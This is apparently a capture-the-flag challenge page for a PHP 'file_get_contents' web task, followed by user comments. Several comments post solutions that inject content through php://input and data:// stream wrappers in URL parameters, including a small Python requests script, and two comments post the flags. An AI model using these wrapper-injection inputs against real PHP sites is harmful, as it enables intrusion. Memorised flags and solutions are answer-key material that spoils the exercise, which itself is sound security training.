file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
3104
提 示:
描 述:
file_get_contents????
评论
飞天的母猪 5小时前
举报
flag{688ebf9ece3756a3a5ac4e16616f1873}
xiazhi 1月前
举报
url/?ac=bugku&fn=flag.txt
bbggddaa 1月前
举报
https://blog.csdn.net/silence1_/article/details/90241302
LLTVLL 1月前
举报
?ac=123&fn=php://input,hackbar中post参数1
2324291123 5月前
举报
import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)
一路奔腾 9月前
举报
file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/
steve07222 1年前
举报
http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1
wxy1343 1年前
举报
http://114.67.175.224:15664/?ac=1&fn=data:,1
wxy1343 1年前
举报
flag{6fccd47ef5e5988f1e2c4989bf554614}
你比大葱更美丽 1年前
举报
用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的
turriT0Psis 1月前
举报
谢谢,我试了好久都不行,多亏受到您的点拨